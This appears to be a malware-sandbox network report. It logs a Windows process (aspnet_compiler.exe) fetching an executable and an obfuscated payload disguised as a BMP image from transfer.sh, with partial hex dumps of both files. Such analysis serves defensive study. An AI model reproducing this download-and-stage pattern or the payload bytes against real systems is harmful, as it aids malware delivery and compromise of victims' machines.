                                                                                                                                                                                                                                                                Data Ascii: { "geoplugin_request":"84.17.52.8", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Zurich", "geoplugin_region":"Zurich", "geoplugin_regionCode":"ZH", "geoplugin_regionName":"Zurich", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.43", "geoplugin_longitude":"8.5718", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9304}


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                0192.168.2.349703144.76.136.153443C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                2023-01-05 08:22:57 UTC0OUTGET /get/J59PTO/Cuhcxlcg.exe HTTP/1.1
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                                                Host: transfer.sh
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2023-01-05 08:22:58 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                Date: Thu, 05 Jan 2023 08:22:58 GMT
                                                                                                                                                                                                                                                                Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                                Content-Length: 8704
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="Cuhcxlcg.exe"
                                                                                                                                                                                                                                                                Retry-After: Thu, 05 Jan 2023 09:23:00 GMT
                                                                                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                                                                                X-Ratelimit-Key: 127.0.0.1,84.17.52.8,84.17.52.8
                                                                                                                                                                                                                                                                X-Ratelimit-Limit: 10
                                                                                                                                                                                                                                                                X-Ratelimit-Rate: 600
                                                                                                                                                                                                                                                                X-Ratelimit-Remaining: 9
                                                                                                                                                                                                                                                                X-Ratelimit-Reset: 1672906980
                                                                                                                                                                                                                                                                X-Remaining-Days: n/a
                                                                                                                                                                                                                                                                X-Remaining-Downloads: n/a
                                                                                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                                                2023-01-05 08:22:58 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 04 cb cf 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 00 00 00 08 00 00 00 00 00 00 5a 36 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL 0Z6 @@ `


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                1192.168.2.349704144.76.136.153443C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                2023-01-05 08:23:10 UTC9OUTGET /get/3GTNpY/Rtbdyyicls.bmp HTTP/1.1
                                                                                                                                                                                                                                                                Host: transfer.sh
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                Date: Thu, 05 Jan 2023 08:23:11 GMT
                                                                                                                                                                                                                                                                Content-Type: image/bmp
                                                                                                                                                                                                                                                                Content-Length: 2048512
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="Rtbdyyicls.bmp"
                                                                                                                                                                                                                                                                Retry-After: Thu, 05 Jan 2023 09:23:12 GMT
                                                                                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                                                                                X-Ratelimit-Key: 127.0.0.1,84.17.52.8,84.17.52.8
                                                                                                                                                                                                                                                                X-Ratelimit-Limit: 10
                                                                                                                                                                                                                                                                X-Ratelimit-Rate: 600
                                                                                                                                                                                                                                                                X-Ratelimit-Remaining: 9
                                                                                                                                                                                                                                                                X-Ratelimit-Reset: 1672906992
                                                                                                                                                                                                                                                                X-Remaining-Days: n/a
                                                                                                                                                                                                                                                                X-Remaining-Downloads: n/a
                                                                                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC10INData Raw: 1d 2c f4 72 68 6b 6e 64 70 62 62 71 87 98 6d 68 d6 71 50 76 64 72 6b 6b 2e 64 74 62 62 71 78 67 6d 68 6e 71 50 76 64 72 6b 6b 6e 64 74 62 62 71 78 67 6d 68 6e 71 50 76 64 72 6b 6b ee 64 74 62 6c 6e c2 69 6d dc 67 bc 71 ce 65 3e a6 4a 3a 0c 1d 11 42 01 0a 08 0a 1a 0f 1c 70 15 05 1c 05 04 1a 44 16 07 42 03 0d 09 4d 01 00 51 14 39 37 52 06 04 0a 01 5a 6f 6f 7b 5c 67 6d 68 6e 71 50 76 34 37 6b 6b 22 65 77 62 2c 6d ce 04 6d 68 6e 71 50 76 64 72 8b 6b 60 45 7f 63 52 71 78 5d 72 68 6e 77 50 76 64 72 6b 6b 30 3c 6b 62 62 51 78 67 6d 08 71 71 50 76 24 72 6b 4b 6e 64 74 60 62 71 7c 67 6d 68 6e 71 50 76 60 72 6b 6b 6e 64 74 62 62 d1 67 67 6d 6a 6e 71 50 76 64 72 68 6b 2e e1 74 62 72 71 78 77 6d 68 6e 71 40 76 64 62 6b 6b 6e 64 74 62 72 71 78 67 6d 68 6e 71 50 76 64
                                                                                                                                                                                                                                                                Data Ascii: ,rhkndpbbqmhqPvdrkk.dtbbqxgmhnqPvdrkkndtbbqxgmhnqPvdrkkdtblnimgqe>J:BpDBMQ97RZoo{\gmhnqPv47kk"ewb,mmhnqPvdrk`EcRqx]rhnwPvdrkk0<kbbQxgmqqPv$rkKndt`bq|gmhnqPv`rkkndtbbggmjnqPvdrhk.tbrqxwmhnq@vdbkkndtbrqxgmhnqPvd
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC25INData Raw: 68 6e 49 9c 8b 9b 8d 53 38 91 9b 8b 42 6f 71 78 67 13 2a 6f 71 54 0d 64 73 6b 6f 57 d7 89 9d 9d 57 58 46 6d 68 6e 49 f8 8b 9b 8d 7a 6b 44 7b 8e 71 66 51 62 67 6d 68 56 e6 ad 89 9b 6d 99 78 69 44 77 62 62 71 06 25 6c 68 6a 0a 1d 77 64 76 51 14 93 9b 8b 44 42 73 78 67 6d 50 1a 8c af 89 7b 89 78 6a 4e 75 74 62 62 49 1e 9a 92 97 56 c8 af 89 9b 4a 83 94 91 9b 4c 0e 63 71 78 47 6e 68 6e 71 2e 34 65 72 6f 10 8c 64 74 66 5b 32 85 98 92 4e 4e 6d 50 76 64 4a 53 96 91 9b 65 64 7d 63 20 22 6e 68 6e 71 76 74 64 72 19 6b 6e 64 70 63 62 71 58 6c 6d 68 6e 0f 12 77 64 76 10 39 6f 64 70 5b 6c 8c 87 98 4b 48 60 71 50 76 5c 71 96 94 91 75 73 7d 78 29 3d 64 6d 68 6e ff 51 76 64 49 95 94 91 cc 74 62 62 49 3b 98 92 97 56 1e ae 89 9b 52 7b 6b 6e 64 4c bb 9e 8e 87 76 69 77 7c 29
                                                                                                                                                                                                                                                                Data Ascii: hnIS8Boqxg*oqTdskoWWXFmhnIzkD{qfQbgmhVmxiDwbbq%lhjwdvQDBsxgmP{xjNutbbIVJLcqxGnhnq.4erodtf[2NNmPvdJSed}c "nhnqvtdrkndpcbqXlmhnwdv9odp[lKH`qPv\qus}x)=dmhnQvdItbbI;VR{kndLviw|)
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC41INData Raw: 6e 65 72 6f 51 6c 98 8b 9d 44 51 69 67 6d 68 56 86 ab 89 9b 63 6f 74 73 3c 31 61 62 71 78 39 6d 68 6e 32 50 76 64 f3 96 94 91 44 6d 62 62 71 06 25 6c 68 6a 0a b2 76 64 76 52 a6 95 9b 8b 44 42 6e 78 67 6d 50 ac 8a af 89 5c 1f 94 94 91 44 52 62 62 71 06 25 6c 68 6a 0a 52 77 64 76 51 c2 95 9b 8b 44 42 58 78 67 6d 50 f0 8a af 89 75 71 74 7c 36 21 77 62 62 71 3d 99 92 97 32 8d af 89 44 72 6b 6b 56 f7 88 9d 9d 64 6b 64 4d 78 6e 71 50 4e 12 89 94 94 71 95 67 67 42 52 78 67 6d 50 06 8a af 89 5c 5b 6b 6b 6e 44 56 62 62 71 06 25 6c 68 6a 0a 1b 77 64 76 51 24 95 9b 8b 44 42 6f 78 67 6d 50 2a 8a af 89 5c bb 95 94 91 5c 10 62 62 71 69 6f 72 75 0f 62 58 4e cd 8c 94 94 71 98 67 61 42 6a 78 67 6d 16 2c 70 50 72 1f 6e 6a 6b 6a 5d 62 99 9d 8e 5e 47 69 68 6e 71 68 7d 9f 8d
                                                                                                                                                                                                                                                                Data Ascii: neroQlDQigmhVcots<1abqx9mhn2PvdDmbbq%lhjvdvRDBnxgmP\DRbbq%lhjRwdvQDBXxgmPuqt|6!wbbq=2DrkkVdkdMxnqPNqggBRxgmP\[kknDVbbq%lhjwdvQ$DBoxgmP*\\bbqiorubXNqgaBjxgm,pPrnjkj]b^Gihnqh}
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC57INData Raw: 4b 51 64 74 62 5a f2 85 98 92 75 7d 53 68 d7 74 72 6b 15 70 64 74 66 76 60 75 19 7d 68 6e 7b 2e 66 64 72 61 7c 71 68 0a 72 62 71 72 76 63 79 64 60 5b 5e 23 73 6b 6d 48 44 78 62 62 71 06 25 6c 68 6a 0a b4 76 64 76 51 2a 93 9b 8b 44 42 51 78 67 6d 50 58 8c af 89 75 65 74 7f 10 b7 75 62 66 59 7f 62 6d 6e 7d 6b 70 40 64 72 6b 53 72 99 8b 9d 79 62 59 47 55 68 6e 71 ae 78 7d 72 53 6c 93 9b 8b 7d 6d 62 59 47 4f 68 6e 71 68 8b 98 8d 94 6b 71 6e 67 41 5a 9d 7c 67 6d 50 93 76 50 76 44 67 6b 6b 6e 5c 90 9e 9d 8e 63 74 4f 50 ff 75 50 76 7f 61 4b 4b 14 64 74 62 5a be 84 98 92 50 2d 7b 50 76 44 61 6b 6b 6e 1a 36 63 62 75 03 9b 6d 68 6a 4b e6 8a 9b 8d 4d 4b 7c 64 74 62 5a da 84 98 92 73 7d 52 70 35 64 72 6b 15 2c 65 74 66 19 7a 79 67 69 51 fa 8d af 89 42 52 36 6b 6e 64
                                                                                                                                                                                                                                                                Data Ascii: KQdtbZu}Shtrkpdtfv`u}hn{.fdra|qhrbqrvcyd`[^#skmHDxbbq%lhjvdvQ*DBQxgmPXuetubfYbmn}kp@drkSrybYGUhnqx}rSl}mbYGOhnqhkqngAZ|gmPvPvDgkkn\ctOPuPvaKKdtbZP-{PvDakkn6cbumhjKMK|dtbZs}Rp5drk,etfzygiQBR6knd
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC73INData Raw: 79 71 79 58 45 6d 68 6e 0f 12 77 64 76 10 41 6f 64 70 5b 0e 8c 87 98 4b 48 4c 71 50 76 5c 13 96 94 91 75 7d 7d 74 28 3d 64 6d 68 6e 64 54 76 64 47 6b 6b 6e e5 76 62 62 51 65 67 6d 68 56 30 ad 89 9b 6d 8f 78 60 44 79 62 62 71 06 25 6c 68 6a 0a 1d 77 64 76 51 42 93 9b 8b 44 42 75 78 67 6d 50 70 8c af 89 73 61 62 53 da 67 74 62 73 79 67 76 34 2d 6a 71 50 76 8c 73 6b 6b 28 65 74 62 95 72 78 67 ad 6c 6e 71 70 7e 64 72 6b 15 2c 65 74 66 19 36 79 67 69 52 86 8d af 89 42 52 69 6b 6e 64 4c bf 9e 8e 87 79 7e 67 4e 5f 50 76 64 4a bb 97 91 9b 4c 8c 9d 8e 87 47 41 68 6e 71 68 b7 98 8d 94 4b 78 6a df 06 42 9d ad 89 2b 09 10 33 51 76 60 09 26 6a 6e 60 15 1c e8 70 78 63 45 8b 6d 71 56 56 91 93 6b 6b 10 ef 75 62 66 59 9f 64 6d 6e 10 dc 51 76 60 5a 04 6f 6e 62 62 f8 71 73
                                                                                                                                                                                                                                                                Data Ascii: yqyXEmhnwdvAodp[KHLqPv\u}}t(=dmhndTvdGkknvbbQegmhV0mx`Dybbq%lhjwdvQBDBuxgmPpsabSgtbsygv4-jqPvskk(etbrxglnqp~drk,etf6ygiRBRikndLy~gN_PvdJLGAhnqhKxjB+3Qv`&jn`pxcEmqVVkkubfYdmnQv`Zonbbqs
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC89INData Raw: 67 55 e4 6c 71 50 4e db 8d 94 94 56 5d 74 62 62 60 79 78 74 31 2b 75 50 76 64 3b 6a 6b 6e e6 77 62 62 9f 79 67 6d 3f 6a 71 50 56 62 72 6b 6b 10 26 75 62 66 0a 45 66 6d 6c 54 18 ae 89 9b 54 4b 6b 6e 64 74 5a 3c 8f 87 98 7c 6a 71 65 31 65 66 52 7d 6b 6e 64 4c 2f 9c 8e 87 76 6b 77 7d 10 43 70 44 7b 6b 6b 6e 1a 36 63 62 75 03 33 6c 68 6a 4b 62 88 9b 8d 4d 4b 71 64 74 62 5a 56 86 98 92 77 67 62 56 4e b8 73 6b 6b 71 95 67 61 42 70 78 67 6d 16 2c 70 50 72 1f 6b 6a 6b 6a 5e 72 9c 9d 8e 5e 47 6d 68 6e 71 68 8d 99 8d 94 7a 68 7b 6c 3b 27 72 78 67 6d a8 6e 71 50 65 66 72 6b 59 6f 64 74 42 6b 71 78 67 13 2a 6f 71 54 0d 4c 73 6b 6f 57 b5 89 9d 9d 57 58 60 6d 68 6e 49 96 8b 9b 8d 53 96 6f 64 74 42 47 71 78 67 55 df 93 8e af 4e 01 8d 94 94 4e 61 74 62 62 0f 3a 66 6d 6c
                                                                                                                                                                                                                                                                Data Ascii: gUlqPNV]tbb`yxt1+uPvd;jknwbbygm?jqPVbrkk&ubfEfmlTTKkndtZ<|jqe1efR}kndL/vkw}CpD{kkn6cbu3lhjKbMKqdtbZVwgbVNskkqgaBpxgm,pPrkjkj^r^Gmhnqhzh{l;'rxgmnqPefrkYodtBkqxg*oqTLskoWWX`mhnISodtBGqxgUNNatbb:fml
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC105INData Raw: 71 50 4e 64 72 6b 6b 90 68 75 62 27 36 78 67 6d 3b 6a 71 50 f5 65 72 6b 35 6f 64 74 9b 62 71 78 2a 6c 68 6e 02 55 76 64 24 6b 6b 6e 7e 75 62 62 99 7d 67 6d b6 68 71 50 a6 64 72 6b fc 6b 64 74 50 67 71 78 8b 6d 68 6e c5 53 76 64 f4 6d 6b 6e db 76 62 62 08 7f 67 6d 94 6c 71 50 50 64 72 6b 83 68 64 74 1c 62 71 78 d7 69 68 6e 4d 57 76 64 40 6f 6b 6e de 71 62 62 07 7b 67 6d a7 6f 71 50 e6 62 72 6b 54 6a 64 74 72 67 71 78 2b 6d 68 6e 62 50 76 64 ed 69 6b 6e 36 77 62 62 ee 7e 67 6d d2 68 71 50 6d 60 72 6b 1f 6f 64 74 0b 63 71 78 be 69 68 6e e9 53 76 64 5a 6f 6b 6e 65 70 62 62 88 7d 67 6d ef 69 71 50 42 66 72 6b 7d 69 64 74 09 64 71 78 05 6a 68 6e 82 51 76 64 e7 6f 6b 6e 89 70 62 62 f8 78 67 6d f8 6c 71 50 77 66 72 6b c6 6e 64 74 15 66 71 78 85 6d 68 6e 4c 53 76
                                                                                                                                                                                                                                                                Data Ascii: qPNdrkkhub'6xgm;jqPerk5odtbqx*lhnUvd$kkn~ubb}gmhqPdrkkdtPgqxmhnSvdmknvbbgmlqPPdrkhdtbqxihnMWvd@oknqbb{gmoqPbrkTjdtrgqx+mhnbPvdikn6wbb~gmhqPm`rkodtcqxihnSvdZoknepbb}gmiqPBfrk}idtdqxjhnQvdoknpbbxgmlqPwfrkndtfqxmhnLSv
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC121INData Raw: 76 43 fc 68 64 72 71 61 51 79 67 6d 68 10 33 51 76 60 09 64 6a 6e 60 4e ae 9d 8e 87 41 4d 68 6e 71 50 4e a5 8d 94 94 6e 64 65 6f 73 70 06 51 6f 68 6a 59 c3 70 64 74 53 95 6a 64 74 9c 6e 7b 78 22 47 68 6e 71 c5 72 64 72 6e 6b 6e 64 d5 66 62 71 6c 67 6d 68 d5 70 50 76 7f 73 6b 6b f1 64 74 62 9f 73 78 67 ac 6a 6e 71 ae 75 64 72 dd 6f 6e 64 6d 60 62 71 ac 65 6d 68 50 70 50 76 56 71 6b 6b 39 65 74 62 38 71 78 67 61 6c 6e 71 2e 75 64 72 ab 6f 6e 64 a9 63 62 71 cd 65 6d 68 00 71 50 76 00 72 6b 6b 27 64 74 62 3e 73 78 67 4e 68 6e 71 c7 77 64 72 41 6f 6e 64 fa 63 62 71 03 66 6d 68 c1 72 50 76 83 73 6b 6b 9e 67 74 62 13 75 78 67 9a 68 6e 71 c2 76 64 72 44 6a 6e 64 3a 60 62 71 5d 66 6d 68 e2 72 50 76 7f 76 6b 6b 56 f4 70 62 62 49 ef 63 6d 68 4e 76 50 76 64 4a 54 94
                                                                                                                                                                                                                                                                Data Ascii: vChdrqaQygmh3Qv`djn`NAMhnqPNndeospQohjYpdtSjdtn{x"GhnqrdrnkndfbqlgmhpPvskkdtbsxgjnqudrondm`bqemhPpPvVqkk9etb8qxgalnq.udrondcbqemhqPvrkk'dtb>sxgNhnqwdrAondcbqfmhrPvskkgtbuxghnqvdrDjnd:`bq]fmhrPvvkkVpbbIcmhNvPvdJT
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC137INData Raw: 1f 34 63 62 75 42 56 96 97 91 57 70 64 64 72 6b 53 48 9f 8b 9d 73 73 52 76 6c 7f 36 62 51 56 72 72 6b 6b 56 77 8f 9d 9d 65 52 5f cd 96 91 8e 70 7e 64 72 6b 53 6c 9f 8b 9d 79 62 7c 47 7e 68 6e 71 2e 34 65 72 6f 10 65 65 74 66 58 9a 82 98 92 4e 4e 60 50 76 64 4a 8b 91 91 9b 65 6a 7d 66 21 22 6e 68 6e 71 be 8a 9b 8d 9d 96 91 9b ed 62 62 71 58 50 6d 68 6e 49 90 8c 9b 8d 74 9a 7d 6d 54 48 62 71 78 5f df 92 91 8e 46 65 65 52 6f 6b 6e 64 0a 20 63 71 7c 1c 46 69 6e 75 6a ed 9e 8d 94 4d 4e 60 74 62 62 49 e8 9d 92 97 75 62 58 4e 58 72 6b 6b 7b 77 7e 42 58 71 78 67 13 2a 6f 71 54 0d 6a 73 6b 6f 54 15 8e 9d 9d 57 58 40 6d 68 6e 49 36 8c 9b 8d 53 bd 95 9b 8b 42 4b 71 78 67 55 3f 94 8e af 60 5c d9 6a 6b 6e 5c d4 63 62 71 67 95 7e 61 4e 64 50 76 64 4a 55 91 91 9b 6a 71
                                                                                                                                                                                                                                                                Data Ascii: 4cbuBVWpddrkSHssRvl6bQVrrkkVweR_p~drkSlyb|G~hnq.4eroeetfXNN`PvdJej}f!"nhnqbbqXPmhnIt}mTHbqx_FeeRoknd cq|FinujMN`tbbIubXNXrkk{w~BXqxg*oqTjskoTWX@mhnI6SBKqxgU?`\jkn\cbqg~aNdPvdJUjq
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC153INData Raw: 8f 74 7c 6d 48 6e 71 50 76 44 ff 6b 6b 6e 44 2b 62 62 71 21 fb 4d 70 6e 71 50 56 48 72 6b 6b 36 9a 7a 6f 62 8f 74 7c 6d 48 6f 71 50 76 9a 7e 66 6b f2 9a 78 79 62 51 79 67 6d 68 4e f9 50 76 64 52 46 6b 6e 64 2d fe 42 62 78 67 6d 48 44 71 50 76 3c 8c 65 66 6e 9a 78 79 62 51 79 67 6d 68 90 7d 5d 76 f8 52 f1 6b 6e 64 54 51 62 71 78 3e 93 66 63 71 ae 7a 7f 72 4b 6a 6e 64 74 9c 6e 7c 78 fb 4d 5f 6e 71 50 56 26 72 6b 6b 36 9a 7a 6f 62 8f 74 7c 6d 48 6f 71 50 76 9a 7e 66 6b f2 9a 78 79 62 51 79 67 6d 68 4e f3 50 76 64 52 4f 6b 6e 64 2c fe 42 74 78 67 6d 48 37 71 50 76 3c 8c 65 75 6e 9a 78 79 62 51 7a 67 6d 68 90 7d 4e 76 f8 52 58 6b 6e 64 54 05 62 71 78 3f 93 66 70 71 ae 7a 7f 72 4b 69 6e 64 74 9c 6e 6f 78 fb 93 64 75 71 70 74 64 72 6b 4b 8c 64 74 62 42 3a 78 67
                                                                                                                                                                                                                                                                Data Ascii: t|mHnqPvDkknD+bbq!MpnqPVHrkk6zobt|mHoqPv~fkxybQygmhNPvdRFknd-BbxgmHDqPv<efnxybQygmh}]vRkndTQbqx>fcqzrKjndtn|xM_nqPV&rkk6zobt|mHoqPv~fkxybQygmhNPvdROknd,BtxgmH7qPv<eunxybQzgmh}NvRXkndTbqx?fpqzrKindtnoxduqptdrkKdtbB:xg
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC169INData Raw: 68 6e 71 70 7f 64 72 6b 33 90 6a 7c 62 42 3e 79 67 6d 40 2e 73 50 70 5d bd b6 94 91 42 54 3e 63 71 78 5f a9 b5 91 8e 70 58 64 72 6b 4b 4d 64 74 62 3a 8f 76 6f 6d 48 6c 71 50 76 4c 33 69 6b 68 5e d2 bf 9d 8e 5e 47 c7 68 6e 71 68 ed b9 8d 94 95 62 67 74 42 71 71 78 67 93 64 65 71 cc 56 56 72 6b 6b 56 e7 a9 9d 9d 8f 74 64 6d 48 7d 71 50 76 9a 7e 60 6b f2 44 8e 62 62 71 40 0c b0 97 91 8f 5c 75 64 52 7f 6b 6e 64 54 2c 62 71 78 47 6a 68 6e 71 08 ea 44 eb 6b 6b 6e 4c 34 60 62 77 42 20 b0 97 91 57 70 74 64 72 6b 53 52 b9 8b 9d 9c 7d 7b 67 4d 66 6e 71 50 56 35 72 6b 6b 4e 54 74 62 62 29 e4 47 7d 69 6e 71 78 37 66 72 6d 52 76 b9 8b 9d 44 51 ee 67 6d 68 56 7c 8d 89 9b 52 dc 6b 6e 64 54 2f 62 71 78 3e 93 66 66 71 70 e6 64 72 6b 43 2e 66 74 64 58 9e a4 98 92 4e 4e 21
                                                                                                                                                                                                                                                                Data Ascii: hnqpdrk3j|bB>ygm@.sPp]BT>cqx_pXdrkKMdtb:vomHlqPvL3ikh^^GhnqhbgtBqqxgdeqVVrkkVtdmH}qPv~`kDbbq@\udRkndT,bqxGjhnqDkknL4`bwB WptdrkSR}{gMfnqPV5rkkNTtbb)G}inqx7frmRvDQgmhV|RkndT/bqx>ffqpdrkC.ftdXNN!
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC185INData Raw: 76 64 5a a3 69 6e 62 4e 09 b7 8e 87 41 4d f7 6e 71 50 4e 04 a7 94 94 90 68 40 62 42 7a 78 67 6d 48 a8 71 50 76 44 1e 6b 6b 6e 3d e8 42 b7 70 78 67 55 29 bb 8e af 67 7d 64 55 ee 58 64 74 42 68 71 78 67 45 a1 6c 71 56 4c 4e a7 94 94 48 44 5f 62 62 71 40 78 b8 97 91 60 71 5e f9 70 6b 6d 7d 6b 54 8d 62 71 78 99 63 34 6e 49 54 a3 9b 8d 95 67 62 64 54 7f 62 71 78 99 61 0f 6e ed 70 58 66 72 6b 53 9e b0 8b 9d 42 77 78 67 6d 48 05 71 50 76 3c 8c 65 0c 6e 44 06 63 62 71 40 b0 b9 97 91 59 2e 74 64 74 71 2b ee 93 8b 9d 42 18 78 67 6d 50 ac a5 af 89 9a 7e 5f 6b 4e 6c 74 62 62 51 26 67 6d 68 4e 61 50 76 64 2a f7 4b cc 66 74 62 5a d2 ac 98 92 79 17 66 08 65 1d 52 e4 69 6e 64 4c f1 b6 8e 87 76 20 79 0f 60 51 60 f5 ee 4b 6c 6f 64 74 5a e2 a5 87 98 93 64 62 71 70 7f 64 72
                                                                                                                                                                                                                                                                Data Ascii: vdZinbNAMnqPNh@bBzxgmHqPvDkkn=BpxgU)g}dUXdtBhqxgElqVLNHD_bbq@x`q^pkm}kTbqxc4nITgbdTbqxanpXfrkSBwxgmHqPv<enDcbq@Y.tdtq+BxgmP~_kNltbbQ&gmhNaPvd*KftbZyfeRindLv y`Q`KlodtZdbqpdr
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC201INData Raw: 68 6e 62 5c 5a 62 71 72 4f f2 68 6e 7b 24 17 64 72 69 eb c5 64 74 66 1c da 78 67 69 6a 6d 75 3f 85 66 72 6d 41 7d 54 72 62 37 71 78 67 6d 68 6e 71 2e df 64 72 6f 51 52 64 74 62 4a 6e 7a 67 6b 1a 19 75 50 06 4c f6 6b 6b 64 16 fd 66 62 01 50 f9 6d 68 64 59 48 74 64 74 4b 09 6e 64 76 4a 70 72 78 61 45 50 6e 71 5a 5e fb 72 6b 61 1a 06 74 62 60 f1 d1 67 6d 6c 10 d8 50 76 60 70 68 6f 6b 0b 8c 60 62 77 52 67 6d 68 7d 41 57 76 05 72 6b 6b 6e 64 74 62 1c d9 78 67 69 52 28 71 50 76 4c 6d 69 6b 68 16 e1 66 62 01 50 e3 6d 68 64 03 f3 72 64 02 43 ef 6e 64 7e 10 d7 75 78 17 45 c8 6e 71 5a 5e 7c 70 6b 6d 4e 07 74 62 60 59 6a 64 6d 6e 46 49 50 76 6e 5a f4 6b 6e 6e 00 01 62 71 7a e7 c5 68 6e 75 2e de 64 72 6f 69 6d 60 71 6c 66 1e 85 65 6d 6e 44 71 50 76 77 42 6d 6b 3b 64
                                                                                                                                                                                                                                                                Data Ascii: hnb\ZbqrOhn{$dridtfxgijmu?frmA}Trb7qxgmhnq.droQRdtbJnzgkuPLkkdfbPmhdYHtdtKndvJprxaEPnqZ^rkatb`gmlPv`phok`bwRgmh}AWvrkkndtbxgiR(qPvLmikhfbPmhdrdCnd~uxEnqZ^|pkmNtb`YjdmnFIPvnZknnbqzhnu.droim`qlfemnDqPvwBmk;d
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC217INData Raw: 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 90 61 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 44 65 74 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 6c 62 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 45 65 74 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 68 62 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 42 65 74 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 64 62 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 43 65 74 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 60 62 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 40 65 74 60 4a 7d 7a 67 6b 42 6e 71 7a 78 65 7c 6b 04 7c 62 74 64 48 71 2e 4f 78 6a 6e 77 78 7d 66 72 6d bb 41 65 74 60 4a 7d 7a 67 6b 42 6e 71 12 78 60 7c 6b 65 6f 6a 76 6c 61 1e 6e 61 6d 6e 44 71 50 76 32 5a 7e 69 6e 62 5c 69 60 71
